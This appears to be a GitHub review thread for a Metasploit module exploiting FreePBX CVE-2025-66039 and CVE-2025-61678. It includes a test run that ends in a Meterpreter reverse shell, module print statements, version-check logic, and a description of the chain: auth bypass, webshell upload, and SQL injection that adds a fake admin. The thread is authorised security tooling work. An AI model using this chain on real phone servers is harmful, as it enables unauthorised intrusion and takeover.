Adds exploit module for FreePBX (CVE-2025-66039, CVE-2025-61678) #20858
jheysel-r7
left a comment
Nice @msutovsky-r7! A couple minor comments. Testing was as expected 👍
Testing
msf exploit(unix/http/freepbx_firmware_file_upload) > set lhost utun5
lhost => utun5
msf exploit(unix/http/freepbx_firmware_file_upload) > set rhosts 10.5.134.168
rhosts => 10.5.134.168
msf exploit(unix/http/freepbx_firmware_file_upload) > set username admin
username => admin
msf exploit(unix/http/freepbx_firmware_file_upload) > run
[*] Started reverse TCP handler on 192.168.3.8:4444
[*] Trying to bypass authentication
[+] Bypass successful, trying upload webshell
[+] Upload successful, triggering..
[*] Sending stage (41503 bytes) to 10.5.134.168
[+] Deleted ../d4kq7oer
[*] Meterpreter session 1 opened (192.168.3.8:4444 -> 10.5.134.168:38918) at 2026-01-27 11:54:25 -0700
meterpreter > getuid
Server username: asterisk
meterpreter > sysinfo
Computer : freepbx.sangoma.local
OS : Linux freepbx.sangoma.local 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux
meterpreter >
if (res&.code == 401 && res.body.include?('FreePBX')) ||
   (res.code == 500)
  return CheckCode::Detected('The FreePBX with authentication bypass detected')
Should this say the following?
return CheckCode::Detected('The FreePBX with authentication bypass detected')
return CheckCode::Detected('FreePBX with Webserver authorization mode detected')
Or does the http request sent above confirm that the auth bypass is exploitable? I'm basing this question off the messaging in the CheckCode::Safe statement below
FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses
that use VoIP to make and receive phone calls. Versions 16.0.44 and 17.0.23 are vulnerable to
multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The
Same comment - can we notify the user of the different version ranges for CVE-2026-61678 here and in the metadata?
versions prior to 16.0.92 for FreePBX 16 and versions prior to 17.0.6 for FreePBX 17
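The two review points above (whether the 401/500 response proves the bypass is exploitable, and the separate version ranges for CVE-2025-61678) can be modelled as two independent signals. The following is an added example, not code from the module or from Metasploit: it treats the response test as configuration detection only, applies the per-branch ranges quoted in the review, and combines them into CheckCode-like verdicts. `Response`, `freepbx_auth_mode_signal?`, `cve_2025_61678_affected?` and `check_verdict` are names assumed for the example.

```ruby
# Added example (not the module's own code): keeps "auth mode detected" apart
# from "version in affected range", as the review discussion suggests.
require 'rubygems' # Gem::Version; Metasploit's Rex::Version is a subclass of it

# Fixed versions for CVE-2025-61678 as quoted in the review, keyed by major branch.
CVE_2025_61678_FIXED = {
  16 => Gem::Version.new('16.0.92'),
  17 => Gem::Version.new('17.0.6')
}.freeze

# Minimal response shape: only the status code and body are inspected.
Response = Struct.new(:code, :body, keyword_init: true)

# True when the response looks like Webserver Authorization Mode is enabled
# (401 carrying 'FreePBX', or a 500). This detects the configuration only;
# it does not prove that the bypass itself works.
def freepbx_auth_mode_signal?(res)
  return false if res.nil?
  (res.code == 401 && res.body.to_s.include?('FreePBX')) || res.code == 500
end

# True when the version is inside an affected range for CVE-2025-61678.
# Branches without a quoted range (e.g. 15.x) and malformed strings are
# reported as not affected rather than guessed.
def cve_2025_61678_affected?(version_string)
  v = Gem::Version.new(version_string)
  fixed = CVE_2025_61678_FIXED[v.segments.first]
  return false if fixed.nil?
  v < fixed
rescue ArgumentError
  false
end

# Combined verdict modelled on Msf::Exploit::CheckCode outcomes:
#   :appears  - auth mode detected and version inside the affected range
#   :detected - auth mode detected, version unknown or outside the range
#   :safe     - no auth mode signal at all
def check_verdict(res, version_string = nil)
  return :safe unless freepbx_auth_mode_signal?(res)
  return :appears if version_string && cve_2025_61678_affected?(version_string)
  :detected
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample responses, not captured from a real host.
  res401 = Response.new(code: 401, body: '<title>FreePBX Administration</title>')
  puts check_verdict(res401, '16.0.44')                            # => appears
  puts check_verdict(res401, '17.0.23')                            # => detected
  puts check_verdict(Response.new(code: 200, body: 'ok'), '16.0.44') # => safe
end
```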
[+] Upload successful, triggering..
[*] Sending stage (41224 bytes) to 192.168.168.223
[*] Meterpreter session 9 opened (192.168.168.128:4242 -> 192.168.168.223:47616) at 2026-01-06 12:55:19 +0100
[!] This exploit may require manual cleanup of 'qin7.php' on the target
This appears to be output from a module run where the registry_file_for_clean_up wasn't successful.
Clean up worked for me - could we edit this to reflect expected output where the file gets cleaned up successfully?
print_status('Trying to bypass authentication')
get_session_cookie

print_good('Bypass successful, trying upload webshell')

upload_webshell

print_good('Upload successful, triggering..')
To keep the output consistent. Since all print statements are using present participles it would make sense for all of them to use ... and I think it's most common in framework to use the triple dots, when using dots.
print_status('Trying to bypass authentication')
get_session_cookie
print_good('Bypass successful, trying upload webshell')
upload_webshell
print_good('Upload successful, triggering..')

print_status('Trying to bypass authentication...')
get_session_cookie
print_good('Bypass successful, trying upload webshell...')
upload_webshell
print_good('Upload successful, triggering...')
Release Notes
This adds an exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with an unrestricted file upload (via firmware upload), CVE-2025-61678, which allows for a webshell to be uploaded to the webserver resulting in remote code execution.

This PR adds modules for multiple CVEs (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039). This PR works as a placeholder for now as the modules are not finished, but they contain the basic exploitation logic. All modules use the authentication bypass (CVE-2025-66039). CVE-2025-61675 describes multiple SQL injections, but the SQLi modules use only one variant (one for user insertion, the other one for RCE).

WORK IN PROGRESS, TREAT AS SUCH

CVE-2025-66039 represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user.
CVE-2025-61675 describes multiple SQL injections; the module exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.
CVE-2025-61678 allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server's directory.
To set up the environment, perform a minimal installation from here. Note that Authorization Type needs to be set to webserver: